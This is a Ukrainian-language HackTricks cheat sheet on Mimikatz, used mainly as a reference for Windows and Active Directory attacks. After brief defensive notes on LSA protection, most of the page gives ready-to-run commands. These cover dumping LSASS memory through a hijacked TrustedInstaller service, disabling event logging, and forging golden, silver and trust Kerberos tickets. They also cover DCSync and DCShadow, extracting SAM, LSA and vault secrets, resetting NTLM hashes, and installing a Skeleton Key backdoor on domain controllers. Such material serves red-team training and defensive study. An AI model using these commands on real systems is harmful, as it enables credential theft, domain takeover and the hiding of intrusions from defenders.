Mimikatz
Reading time: 6 minutes
tip
Вивчайте та практикуйте AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Підтримайте HackTricks
- Перевірте плани підписки!
- Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live.
- Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на github.
Ця сторінка базується на одній з adsecurity.org. Перевірте оригінал для отримання додаткової інформації!
LM та відкритий текст в пам'яті
Починаючи з Windows 8.1 та Windows Server 2012 R2, були впроваджені значні заходи для захисту від крадіжки облікових даних:
-
LM хеші та паролі у відкритому тексті більше не зберігаються в пам'яті для підвищення безпеки. Специфічна настройка реєстру, HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest "UseLogonCredential" повинна бути налаштована з значенням DWORD
0
, щоб вимкнути Digest Authentication, забезпечуючи, що паролі у "відкритому тексті" не кешуються в LSASS. -
Захист LSA введено для захисту процесу Local Security Authority (LSA) від несанкціонованого читання пам'яті та ін'єкції коду. Це досягається шляхом позначення LSASS як захищеного процесу. Активація захисту LSA передбачає:
- Модифікацію реєстру в HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa, встановивши
RunAsPPL
наdword:00000001
. - Впровадження об'єкта групової політики (GPO), який забезпечує цю зміну реєстру на керованих пристроях.
Незважаючи на ці заходи, такі інструменти, як Mimikatz, можуть обійти захист LSA, використовуючи специфічні драйвери, хоча такі дії, ймовірно, будуть зафіксовані в журналах подій.
Протидія видаленню SeDebugPrivilege
Зазвичай адміністратори мають SeDebugPrivilege, що дозволяє їм налагоджувати програми. Цю привілегію можна обмежити, щоб запобігти несанкціонованим дампам пам'яті, що є поширеною технікою, яку використовують зловмисники для витягування облікових даних з пам'яті. Однак, навіть з видаленою цією привілегією, обліковий запис TrustedInstaller все ще може виконувати дампи пам'яті, використовуючи налаштовану конфігурацію служби:
sc config TrustedInstaller binPath= "C:\\Users\\Public\\procdump64.exe -accepteula -ma lsass.exe C:\\Users\\Public\\lsass.dmp"
sc start TrustedInstaller
Це дозволяє вивантажити пам'ять lsass.exe
у файл, який потім можна проаналізувати на іншій системі для витягнення облікових даних:
# privilege::debug
# sekurlsa::minidump lsass.dmp
# sekurlsa::logonpasswords
Mimikatz Options
Зловмисне втручання в журнали подій у Mimikatz включає дві основні дії: очищення журналів подій та патчинг служби подій, щоб запобігти реєстрації нових подій. Нижче наведені команди для виконання цих дій:
Clearing Event Logs
- Command: Ця дія спрямована на видалення журналів подій, ускладнюючи відстеження зловмисних дій.
- Mimikatz не надає прямої команди в своїй стандартній документації для очищення журналів подій безпосередньо через командний рядок. Однак маніпуляції з журналами подій зазвичай включають використання системних інструментів або скриптів поза Mimikatz для очищення конкретних журналів (наприклад, використовуючи PowerShell або Windows Event Viewer).
Experimental Feature: Patching the Event Service
-
Command:
event::drop
-
Ця експериментальна команда призначена для зміни поведінки служби реєстрації подій, ефективно запобігаючи їй реєструвати нові події.
-
Example:
mimikatz "privilege::debug" "event::drop" exit
-
Команда
privilege::debug
забезпечує, щоб Mimikatz працював з необхідними привілеями для зміни системних служб. -
Команда
event::drop
потім патчить службу реєстрації подій.
Kerberos Ticket Attacks
Golden Ticket Creation
Золотий квиток дозволяє для доступу на рівні домену шляхом імперсонації. Ключова команда та параметри:
- Command:
kerberos::golden
- Parameters:
/domain
: Ім'я домену./sid
: Ідентифікатор безпеки (SID) домену./user
: Ім'я користувача для імперсонації./krbtgt
: NTLM хеш облікового запису служби KDC домену./ptt
: Безпосередньо інжектує квиток в пам'ять./ticket
: Зберігає квиток для подальшого використання.
Example:
mimikatz "kerberos::golden /user:admin /domain:example.com /sid:S-1-5-21-123456789-123456789-123456789 /krbtgt:ntlmhash /ptt" exit
Створення Срібного Квитка
Срібні Квитки надають доступ до конкретних сервісів. Ключова команда та параметри:
- Команда: Схожа на Золотий Квиток, але націлена на конкретні сервіси.
- Параметри:
/service
: Сервіс, на який націлюються (наприклад, cifs, http).- Інші параметри схожі на Золотий Квиток.
Приклад:
mimikatz "kerberos::golden /user:user /domain:example.com /sid:S-1-5-21-123456789-123456789-123456789 /target:service.example.com /service:cifs /rc4:ntlmhash /ptt" exit
Створення квитків довіри
Квитки довіри використовуються для доступу до ресурсів між доменами, використовуючи відносини довіри. Основна команда та параметри:
- Команда: Схожа на Золотий Квиток, але для відносин довіри.
- Параметри:
/target
: Повне доменне ім'я цільового домену./rc4
: NTLM хеш для облікового запису довіри.
Приклад:
mimikatz "kerberos::golden /domain:child.example.com /sid:S-1-5-21-123456789-123456789-123456789 /sids:S-1-5-21-987654321-987654321-987654321-519 /rc4:ntlmhash /user:admin /service:krbtgt /target:parent.example.com /ptt" exit
Додаткові команди Kerberos
-
Список квитків:
-
Команда:
kerberos::list
-
Перераховує всі квитки Kerberos для поточної сесії користувача.
-
Передати кеш:
-
Команда:
kerberos::ptc
-
Впроваджує квитки Kerberos з кеш-файлів.
-
Приклад:
mimikatz "kerberos::ptc /ticket:ticket.kirbi" exit
-
Передати квиток:
-
Команда:
kerberos::ptt
-
Дозволяє використовувати квиток Kerberos в іншій сесії.
-
Приклад:
mimikatz "kerberos::ptt /ticket:ticket.kirbi" exit
-
Очищення квитків:
-
Команда:
kerberos::purge
-
Очищає всі квитки Kerberos з сесії.
-
Корисно перед використанням команд маніпуляції квитками, щоб уникнути конфліктів.
Підробка Active Directory
-
DCShadow: Тимчасово змусити машину діяти як DC для маніпуляції об'єктами AD.
-
mimikatz "lsadump::dcshadow /object:targetObject /attribute:attributeName /value:newValue" exit
-
DCSync: Імітувати DC для запиту даних паролів.
-
mimikatz "lsadump::dcsync /user:targetUser /domain:targetDomain" exit
Доступ до облікових даних
-
LSADUMP::LSA: Витягти облікові дані з LSA.
-
mimikatz "lsadump::lsa /inject" exit
-
LSADUMP::NetSync: Імітувати DC, використовуючи дані паролів облікового запису комп'ютера.
-
У оригінальному контексті не надано конкретної команди для NetSync.
-
LSADUMP::SAM: Доступ до локальної бази даних SAM.
-
mimikatz "lsadump::sam" exit
-
LSADUMP::Secrets: Розшифрувати секрети, збережені в реєстрі.
-
mimikatz "lsadump::secrets" exit
-
LSADUMP::SetNTLM: Встановити новий NTLM хеш для користувача.
-
mimikatz "lsadump::setntlm /user:targetUser /ntlm:newNtlmHash" exit
-
LSADUMP::Trust: Отримати інформацію про аутентифікацію довіри.
-
mimikatz "lsadump::trust" exit
Різне
- MISC::Skeleton: Впровадити бекдор в LSASS на DC.
mimikatz "privilege::debug" "misc::skeleton" exit
Підвищення привілеїв
-
PRIVILEGE::Backup: Отримати права на резервне копіювання.
-
mimikatz "privilege::backup" exit
-
PRIVILEGE::Debug: Отримати привілеї налагодження.
-
mimikatz "privilege::debug" exit
Витягування облікових даних
-
SEKURLSA::LogonPasswords: Показати облікові дані для користувачів, які увійшли в систему.
-
mimikatz "sekurlsa::logonpasswords" exit
-
SEKURLSA::Tickets: Витягти квитки Kerberos з пам'яті.
-
mimikatz "sekurlsa::tickets /export" exit
Маніпуляція SID та токенами
-
SID::add/modify: Змінити SID та SIDHistory.
-
Додати:
mimikatz "sid::add /user:targetUser /sid:newSid" exit
-
Змінити: У оригінальному контексті не надано конкретної команди для зміни.
-
TOKEN::Elevate: Імітувати токени.
-
mimikatz "token::elevate /domainadmin" exit
Служби терміналів
-
TS::MultiRDP: Дозволити кілька RDP сесій.
-
mimikatz "ts::multirdp" exit
-
TS::Sessions: Перерахувати сесії TS/RDP.
-
У оригінальному контексті не надано конкретної команди для TS::Sessions.
Сховище
- Витягти паролі з Windows Vault.
mimikatz "vault::cred /patch" exit
tip
Вивчайте та практикуйте AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Підтримайте HackTricks
- Перевірте плани підписки!
- Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live.
- Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на github.